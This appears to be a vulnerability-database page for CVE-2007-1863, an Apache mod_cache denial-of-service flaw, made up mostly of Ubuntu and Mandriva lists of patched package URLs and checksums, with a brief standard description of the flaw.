    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   286544 d555931490d44d93bec31c4bfc19ed12
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   145014 3e06ceb0a55598d82f9f781c44e210b3
  i386 architecture (x86 compatible Intel/AMD)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   806938 050bb7665332d3761e1a8e47939fa507
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   209556 ee530b24aba8838001ebb6c901bc90cd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   205718 b52a17c63909eae3c49bad0ab1958f4b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   209158 1844fa5e09224a90944f8b886ddb5a2a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   171296 9de8aba41f7e3d60f41536ca712adebb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   172078 01ccd554177364747b08e2933f121d2c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:    93240 4573597317416869646eb2ea42cd0945
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:    36150 77666d65bade6a91bd58826c79f11dc9
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   266390 a3963d8e76f6865404f7fadb47880c87
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   137604 387f6bcdaa58dbbe53082241b3231844
  powerpc architecture (Apple Macintosh G3/G4/G5)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   865372 27d7f1de1fcb2114d3f3b0a774302488
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   221542 1ae8fa5cf4b77f3b2aa054e2886e587e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   217044 9134983c40107f79fcac8d1eacbc7117
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   221324 b435dc09c63ecbcd564a0923a8f07350
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   171296 6d2a0abfb7a1daaeae56559eeb322dcb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   172064 ecc2037409554ea43c5a6848aa510c76
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   104654 d0957d8df044c4a34437241792ed97d1
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:    36148 34e102e1d2e1c6a6f31801dfb98cb82a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   284548 c8f325ccc42cbe77191d4ddd9abc2a4e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   144238 82cfbfcec5fc4931078145af8947c035
  sparc architecture (Sun SPARC/UltraSPARC)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   811594 d8548e537fd81994bbb638e105dfbf8b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   212160 81cd0197ff89b79c967c1074ede9f8d7
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   207870 5d80ed8dc39b0d4d59fccb747624a684
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   211578 9407383d85db831dab728b39cce9acc8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   171294 5e4d695a99bdc1fdfb0bfcef8b91d03d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   172064 06e3e765d799e281dba7329ff9d9e138
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:    93796 1048b47b289fb2047fa9ac7ebbe94a57
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:    36150 0d106a177aa4271b1cfc0e96eec1a748
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   268444 3912123e7c71cc638132305ca89fe23b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   130626 f4444e0239c2da7d3c31e3486606f95a
Updated packages for Ubuntu 7.04:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1.diff.gz
      Size/MD5:   112120 f7b1a17718aed7ca73da3a6d7aad06b0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1.dsc
      Size/MD5:     1128 e82b1bee591fff50d6673ed1a443e543
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3.orig.tar.gz
      Size/MD5:  6342475 f72ffb176e2dc7b322be16508c09f63c
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.3-3.2ubuntu0.1_all.deb
      Size/MD5:  2199184 c03756f87cb164213428532f70e0c198
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.2.3-3.2ubuntu0.1_all.deb
      Size/MD5:   272064 5be351f491f8d1aae9a270d1214e93e3
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.3-3.2ubuntu0.1_all.deb
      Size/MD5:  6674104 bdbabf8f478562f0e003737e977ffc7b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1_all.deb
      Size/MD5:    38668 9f0c7c01e8441285c084002eb4619065
  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   449624 1b54a8000c40eaaa0f9e31527b9bb180
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   445346 d15625641a3247fbf5d9d9b9aed34968
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   449208 55f39c28a4de98d53f80231aeb7d6c59
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   403570 0042c75be8a2d128d62b79398deaefa8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   404138 929772b95ea67f338ad423a65b2b7011
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   341312 906819b0de863209575aa65d39a594a5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   971462 f85e32c5f6437ce149553aee97ffd934
  i386 architecture (x86 compatible Intel/AMD)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   432922 c1b81ac7dc7b7a0b2261fd10d9bcf5c6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   428856 f506f2a9dd2dbd5c2d3f72a476cc3537
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   432314 a5a11947ad8cf14604efa7ddcfd20bfe
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   403574 da84a3a99276f14a11ac892ce7eee170
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   404138 0fdd43a53e6957aa3a348a7bd9c876f5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   340396 88a0ddbc58335416d91c9f10adc9d5f5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   929716 138d58487b882e6002e3c5e4a9489add
  powerpc architecture (Apple Macintosh G3/G4/G5)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   451530 ddc437092ef642fcd396713cd1972f4c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   446960 af1b667708e062f81bca4e995355394d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   450940 ed9f31ec5045a88446115987c6e97655
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   403574 65801ab51335a15dc370b9341a0e50dd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   404146 fd35e65fadd836feb0190b209947b466
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   360518 b74bc9eead429cd8f0ebecd6a94e5edb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:  1073812 376fe5b1ee383a6d870eea5dd3c6a704
  sparc architecture (Sun SPARC/UltraSPARC)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   434408 c70ef2e9aed191fe53886ceb3725596e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   430574 7b690896da23a151ee5e106d596c1143
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   433918 cc01edfcfc673ba9a86c83fcc66e6870
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   403568 a7660cff70394403c764cf8f30c7298a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   404136 b8587d5eba0be59a6576d6cf645b2122
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   343370 1572a001a612add57d23350210ac1736
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   938586 b74a91fcfbb0503355e94981310bd1ce
                        
| VAR-200706-0660 | CVE-2007-1863 | Apache HTTP Server of mod_cache In module null The problem of caching values that are | CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM | 
                            cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value. The Apache mod_cache module is prone to a denial-of-service vulnerability. 
A remote attacker may be able to exploit this issue to crash the child process. This could lead to denial-of-service conditions if the server is using a multithreaded Multi-Processing Module (MPM).  This could lead to a denial of service
 if using a threaded MPM (CVE-2007-1863).  A local attacker with the
 ability to run scripts on the server could manipulate the scoreboard
 and cause arbitrary processes to be terminated (CVE-2007-3304). 
 
 Updated packages have been patched to prevent the above issues. 
 _______________________________________________________________________
 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 5f906bba3e1195f5ffbc3fcb2a6bde38  2007.0/i586/apache-base-2.2.3-1.1mdv2007.0.i586.rpm
 83a4844cd98ef203958796ce280a71b2  2007.0/i586/apache-devel-2.2.3-1.1mdv2007.0.i586.rpm
 2a6853cad61ca0548715486c5d4c8a23  2007.0/i586/apache-htcacheclean-2.2.3-1.1mdv2007.0.i586.rpm
 bebbc850c030be2ef87ce12d420fb825  2007.0/i586/apache-mod_authn_dbd-2.2.3-1.1mdv2007.0.i586.rpm
 9e08e4738b304aab4f90f4f18aa5da45  2007.0/i586/apache-mod_cache-2.2.3-1.1mdv2007.0.i586.rpm
 989d0538f7882277053f6d4c89ca581c  2007.0/i586/apache-mod_dav-2.2.3-1.1mdv2007.0.i586.rpm
 c1c0fc53dd811dd6176800226574efbf  2007.0/i586/apache-mod_dbd-2.2.3-1.1mdv2007.0.i586.rpm
 e68509c01d66b9d42e676e7974360154  2007.0/i586/apache-mod_deflate-2.2.3-1.1mdv2007.0.i586.rpm
 5596cb5359b7919125fc10be83598445  2007.0/i586/apache-mod_disk_cache-2.2.3-1.1mdv2007.0.i586.rpm
 d71b54240667224fd7da7fec4693c30b  2007.0/i586/apache-mod_file_cache-2.2.3-1.1mdv2007.0.i586.rpm
 3571cab041e622f9399c57f377ac3fe3  2007.0/i586/apache-mod_ldap-2.2.3-1.1mdv2007.0.i586.rpm
 598fdd7aad80fdc557142c5e9fc00677  2007.0/i586/apache-mod_mem_cache-2.2.3-1.1mdv2007.0.i586.rpm
 f4ec774478f5d198ad2e3d3384a5ad83  2007.0/i586/apache-mod_proxy-2.2.3-1.1mdv2007.0.i586.rpm
 ab7726290be59f03a5ade2029a2b02f8  2007.0/i586/apache-mod_proxy_ajp-2.2.3-1.1mdv2007.0.i586.rpm
 d72ab4173d51da4a0c1df63dbb52ccf5  2007.0/i586/apache-mod_ssl-2.2.3-1.1mdv2007.0.i586.rpm
 fcde0ec8b64d83402b53f926ec7fa835  2007.0/i586/apache-mod_userdir-2.2.3-1.1mdv2007.0.i586.rpm
 58a0628d42d23c9aa5df6567789fad40  2007.0/i586/apache-modules-2.2.3-1.1mdv2007.0.i586.rpm
 011487e1afdfb400419303182e5320c7  2007.0/i586/apache-mpm-prefork-2.2.3-1.1mdv2007.0.i586.rpm
 7a755b22020153b44f8d00ba153d3d97  2007.0/i586/apache-mpm-worker-2.2.3-1.1mdv2007.0.i586.rpm
 ef6e11f0d26db492bc9fe83a2dbf53d7  2007.0/i586/apache-source-2.2.3-1.1mdv2007.0.i586.rpm 
 411b90e42ed304f329e9989d64a9dfc5  2007.0/SRPMS/apache-2.2.3-1.1mdv2007.0.src.rpm
 Mandriva Linux 2007.0/X86_64:
 7c5408879073413fb27f2d40854813d0  2007.0/x86_64/apache-base-2.2.3-1.1mdv2007.0.x86_64.rpm
 c720f2a661616b0bf35bc353d14b9b3b  2007.0/x86_64/apache-devel-2.2.3-1.1mdv2007.0.x86_64.rpm
 12164d6d70972cb9ed2fb6581e212bf1  2007.0/x86_64/apache-htcacheclean-2.2.3-1.1mdv2007.0.x86_64.rpm
 5278f8d03ce9d59ec4929d4362b04bbe  2007.0/x86_64/apache-mod_authn_dbd-2.2.3-1.1mdv2007.0.x86_64.rpm
 40c83185db12d04f4953a374b329ebb3  2007.0/x86_64/apache-mod_cache-2.2.3-1.1mdv2007.0.x86_64.rpm
 fe37fb1d4378c4bbcfd8d63bd57c3d4d  2007.0/x86_64/apache-mod_dav-2.2.3-1.1mdv2007.0.x86_64.rpm
 0830bc5d1718a533e3358a45975596ce  2007.0/x86_64/apache-mod_dbd-2.2.3-1.1mdv2007.0.x86_64.rpm
 e18c3a6a322258e73b87170766aa7882  2007.0/x86_64/apache-mod_deflate-2.2.3-1.1mdv2007.0.x86_64.rpm
 fc8c27067e6b04bd549fe0b95579ebaa  2007.0/x86_64/apache-mod_disk_cache-2.2.3-1.1mdv2007.0.x86_64.rpm
 b31385db2199fd33eeb624c80e9d882a  2007.0/x86_64/apache-mod_file_cache-2.2.3-1.1mdv2007.0.x86_64.rpm
 08123786649152eab65e123c75db8e66  2007.0/x86_64/apache-mod_ldap-2.2.3-1.1mdv2007.0.x86_64.rpm
 7de4b739d93683648209dcdc69dd5473  2007.0/x86_64/apache-mod_mem_cache-2.2.3-1.1mdv2007.0.x86_64.rpm
 85fde2923d945f3849d77f806b8bc55d  2007.0/x86_64/apache-mod_proxy-2.2.3-1.1mdv2007.0.x86_64.rpm
 b68991944f2989b6d3f89f7272239d76  2007.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.1mdv2007.0.x86_64.rpm
 19871683773211daa721957dc5dd565d  2007.0/x86_64/apache-mod_ssl-2.2.3-1.1mdv2007.0.x86_64.rpm
 5cf2a97219d6789e4572da1ecddedf16  2007.0/x86_64/apache-mod_userdir-2.2.3-1.1mdv2007.0.x86_64.rpm
 feede872aaf0ca4bbd86ffe24455e9cd  2007.0/x86_64/apache-modules-2.2.3-1.1mdv2007.0.x86_64.rpm
 a00a35d4eba8f538cea741b2fc4079f4  2007.0/x86_64/apache-mpm-prefork-2.2.3-1.1mdv2007.0.x86_64.rpm
 da86251e4417f068d2cafed30e380779  2007.0/x86_64/apache-mpm-worker-2.2.3-1.1mdv2007.0.x86_64.rpm
 ceb7fd32d3ad933ab6a914085f858911  2007.0/x86_64/apache-source-2.2.3-1.1mdv2007.0.x86_64.rpm 
 411b90e42ed304f329e9989d64a9dfc5  2007.0/SRPMS/apache-2.2.3-1.1mdv2007.0.src.rpm
 Mandriva Linux 2007.1:
 9daef91724ded29a3c76e74c261f7766  2007.1/i586/apache-base-2.2.4-6.2mdv2007.1.i586.rpm
 9288ee938a0853d6e0072f839c68c1c2  2007.1/i586/apache-devel-2.2.4-6.2mdv2007.1.i586.rpm
 613a986f9f654f1ce3432ee6f6db2391  2007.1/i586/apache-htcacheclean-2.2.4-6.2mdv2007.1.i586.rpm
 8e0eb376d851d1ddba8850d4233fc3d3  2007.1/i586/apache-mod_authn_dbd-2.2.4-6.2mdv2007.1.i586.rpm
 24de68668efa15e4abaaffd690837256  2007.1/i586/apache-mod_cache-2.2.4-6.2mdv2007.1.i586.rpm
 288866908d43959c4b31c368346ba65d  2007.1/i586/apache-mod_dav-2.2.4-6.2mdv2007.1.i586.rpm
 d25838ec739d7a0037148f573262f81c  2007.1/i586/apache-mod_dbd-2.2.4-6.2mdv2007.1.i586.rpm
 ebad14bcccb73c8f8a27e98a6982a6f1  2007.1/i586/apache-mod_deflate-2.2.4-6.2mdv2007.1.i586.rpm
 810d445f2146848b582e798e368b32ab  2007.1/i586/apache-mod_disk_cache-2.2.4-6.2mdv2007.1.i586.rpm
 307de93279683b5b3e76ee6d971781cc  2007.1/i586/apache-mod_file_cache-2.2.4-6.2mdv2007.1.i586.rpm
 f59890e1bc38cfa598a4100705cf4cc6  2007.1/i586/apache-mod_ldap-2.2.4-6.2mdv2007.1.i586.rpm
 098a05d1cbaa6bfa2d2707896dd6366c  2007.1/i586/apache-mod_mem_cache-2.2.4-6.2mdv2007.1.i586.rpm
 6504f5e57440ff07da16de3d928898f6  2007.1/i586/apache-mod_proxy-2.2.4-6.2mdv2007.1.i586.rpm
 adc3a611a780e23178e93a6cedf135d4  2007.1/i586/apache-mod_proxy_ajp-2.2.4-6.2mdv2007.1.i586.rpm
 659508a67fbe28b5dd9f861384ca1cf1  2007.1/i586/apache-mod_ssl-2.2.4-6.2mdv2007.1.i586.rpm
 604eb70716d7e7b6bc6e8399cc4d9f5c  2007.1/i586/apache-mod_userdir-2.2.4-6.2mdv2007.1.i586.rpm
 750d7cb431356abc88fe7a031f872b04  2007.1/i586/apache-modules-2.2.4-6.2mdv2007.1.i586.rpm
 210be718db221db891452f05a001ee4e  2007.1/i586/apache-mpm-event-2.2.4-6.2mdv2007.1.i586.rpm
 482e3d3af6756108c3e9a26ec2a8ac56  2007.1/i586/apache-mpm-itk-2.2.4-6.2mdv2007.1.i586.rpm
 b76ff4578c127ebd248b21a85a31140a  2007.1/i586/apache-mpm-prefork-2.2.4-6.2mdv2007.1.i586.rpm
 2484dee8a4d4e7604a69abcd1b443954  2007.1/i586/apache-mpm-worker-2.2.4-6.2mdv2007.1.i586.rpm
 9823f9b97e1829df97999494c3a3d453  2007.1/i586/apache-source-2.2.4-6.2mdv2007.1.i586.rpm 
 ccbd9fad2b29ff86d8601f7201f48d72  2007.1/SRPMS/apache-2.2.4-6.2mdv2007.1.src.rpm
 Mandriva Linux 2007.1/X86_64:
 4d043339268bff11fa07897ee3dc2988  2007.1/x86_64/apache-base-2.2.4-6.2mdv2007.1.x86_64.rpm
 afbae73f408fa95c9e4d25e3aa39583d  2007.1/x86_64/apache-devel-2.2.4-6.2mdv2007.1.x86_64.rpm
 d92c22ff28fcd919b3a8525f753066c3  2007.1/x86_64/apache-htcacheclean-2.2.4-6.2mdv2007.1.x86_64.rpm
 abe81d2effd6f4975accbdc8d25d089e  2007.1/x86_64/apache-mod_authn_dbd-2.2.4-6.2mdv2007.1.x86_64.rpm
 480d5c31af3289f26953a691f92e2a51  2007.1/x86_64/apache-mod_cache-2.2.4-6.2mdv2007.1.x86_64.rpm
 3feae93ade4038e67fcbaa691f2a74aa  2007.1/x86_64/apache-mod_dav-2.2.4-6.2mdv2007.1.x86_64.rpm
 b60eead7fe808fbc5eff6cb34f1de80b  2007.1/x86_64/apache-mod_dbd-2.2.4-6.2mdv2007.1.x86_64.rpm
 023afee3221da629fd8e1d34006b7463  2007.1/x86_64/apache-mod_deflate-2.2.4-6.2mdv2007.1.x86_64.rpm
 1180446c8cf65c196352006d6da00e17  2007.1/x86_64/apache-mod_disk_cache-2.2.4-6.2mdv2007.1.x86_64.rpm
 0e8c2dfc0e42c23b0afbada9f8868bb6  2007.1/x86_64/apache-mod_file_cache-2.2.4-6.2mdv2007.1.x86_64.rpm
 32aa45f45b8893d6c23c6892b7ad7e62  2007.1/x86_64/apache-mod_ldap-2.2.4-6.2mdv2007.1.x86_64.rpm
 15c20ffb5fdc8ab2a6fa92157c9f0536  2007.1/x86_64/apache-mod_mem_cache-2.2.4-6.2mdv2007.1.x86_64.rpm
 f91fd6552f480eb36d030bb2e91d30b4  2007.1/x86_64/apache-mod_proxy-2.2.4-6.2mdv2007.1.x86_64.rpm
 2c9d1e35af7adebaeb6284bf5da4dd5f  2007.1/x86_64/apache-mod_proxy_ajp-2.2.4-6.2mdv2007.1.x86_64.rpm
 caa59aaba47c89d20e799a3f02271afd  2007.1/x86_64/apache-mod_ssl-2.2.4-6.2mdv2007.1.x86_64.rpm
 8ac44f8c409ea29492a3acdc1eb44c7f  2007.1/x86_64/apache-mod_userdir-2.2.4-6.2mdv2007.1.x86_64.rpm
 0f2198ec988390ff3b7843a1e7090517  2007.1/x86_64/apache-modules-2.2.4-6.2mdv2007.1.x86_64.rpm
 2548664fde736f25acf59f46c847d1ff  2007.1/x86_64/apache-mpm-event-2.2.4-6.2mdv2007.1.x86_64.rpm
 2434c402bae11969ddf5281f2f042d24  2007.1/x86_64/apache-mpm-itk-2.2.4-6.2mdv2007.1.x86_64.rpm
 8a06ecd19726db033496a042c6a6be2f  2007.1/x86_64/apache-mpm-prefork-2.2.4-6.2mdv2007.1.x86_64.rpm
 e8d339c397409391f3fb36f704c38c6c  2007.1/x86_64/apache-mpm-worker-2.2.4-6.2mdv2007.1.x86_64.rpm
 8a6f923428242f7aa1b4d489739e241b  2007.1/x86_64/apache-source-2.2.4-6.2mdv2007.1.x86_64.rpm 
 ccbd9fad2b29ff86d8601f7201f48d72  2007.1/SRPMS/apache-2.2.4-6.2mdv2007.1.src.rpm
 Corporate 4.0:
 74beb8d1579ce5d5f12c8b15981b6e63  corporate/4.0/i586/apache-base-2.2.3-1.1.20060mlcs4.i586.rpm
 326a8259b0d99bc2938bfa6cd85743e7  corporate/4.0/i586/apache-devel-2.2.3-1.1.20060mlcs4.i586.rpm
 ca305d0928255a65814af781b345a056  corporate/4.0/i586/apache-htcacheclean-2.2.3-1.1.20060mlcs4.i586.rpm
 48c2b6a5ee11c3f011b1f6dc60a86479  corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.1.20060mlcs4.i586.rpm
 b81a3077cb88a34af43a61ad6f2559ea  corporate/4.0/i586/apache-mod_cache-2.2.3-1.1.20060mlcs4.i586.rpm
 ba5aee0b2a86182560e54f0cf4d360bd  corporate/4.0/i586/apache-mod_dav-2.2.3-1.1.20060mlcs4.i586.rpm
 b696352106c5a0d1697385523455c767  corporate/4.0/i586/apache-mod_dbd-2.2.3-1.1.20060mlcs4.i586.rpm
 e79f271f000dd7f3a009cca70fd7e4a2  corporate/4.0/i586/apache-mod_deflate-2.2.3-1.1.20060mlcs4.i586.rpm
 c7bdb987f61099b64e751639ca02dd8a  corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.1.20060mlcs4.i586.rpm
 b0303fcc2f43bdcf25419dde56df2297  corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.1.20060mlcs4.i586.rpm
 f818ff0f890abe230c92069f9d256e5c  corporate/4.0/i586/apache-mod_ldap-2.2.3-1.1.20060mlcs4.i586.rpm
 4247be23e42c368b3880c7ab5ac13c89  corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.1.20060mlcs4.i586.rpm
 e50f1749935c96d3364bdce9af5d22bf  corporate/4.0/i586/apache-mod_proxy-2.2.3-1.1.20060mlcs4.i586.rpm
 a619b4e0130d1db7f77a790fee0917a6  corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.1.20060mlcs4.i586.rpm
 8170e0e77256f08d07b02119400a19f9  corporate/4.0/i586/apache-mod_ssl-2.2.3-1.1.20060mlcs4.i586.rpm
 4a5d94d4f94295efe48266a1d529486e  corporate/4.0/i586/apache-mod_userdir-2.2.3-1.1.20060mlcs4.i586.rpm
 7c0c27197d6b44115366eac339c424f2  corporate/4.0/i586/apache-modules-2.2.3-1.1.20060mlcs4.i586.rpm
 56351aafc723fdea2f2fac22d5046944  corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.1.20060mlcs4.i586.rpm
 ccbb2f27b762b5dd564dc7a00aac6db0  corporate/4.0/i586/apache-mpm-worker-2.2.3-1.1.20060mlcs4.i586.rpm
 a65137ff29ed6a1da1f894d19997faec  corporate/4.0/i586/apache-source-2.2.3-1.1.20060mlcs4.i586.rpm 
 8cdf592a822485abba00dfb6591615ea  corporate/4.0/SRPMS/apache-2.2.3-1.1.20060mlcs4.src.rpm
 Corporate 4.0/X86_64:
 7a9b4f5b3fcf2cac67e4c38022ee2441  corporate/4.0/x86_64/apache-base-2.2.3-1.1.20060mlcs4.x86_64.rpm
 5604ba341d957fbe6182bd2eb29a8e9d  corporate/4.0/x86_64/apache-devel-2.2.3-1.1.20060mlcs4.x86_64.rpm
 8983bda4bbe3b58f9c6c317531eb52b7  corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.1.20060mlcs4.x86_64.rpm
 9baf252cbc8ef8a093ed25e7a0daf25d  corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.1.20060mlcs4.x86_64.rpm
 26cc58bcbfd25a83c15051c8f590a36d  corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm
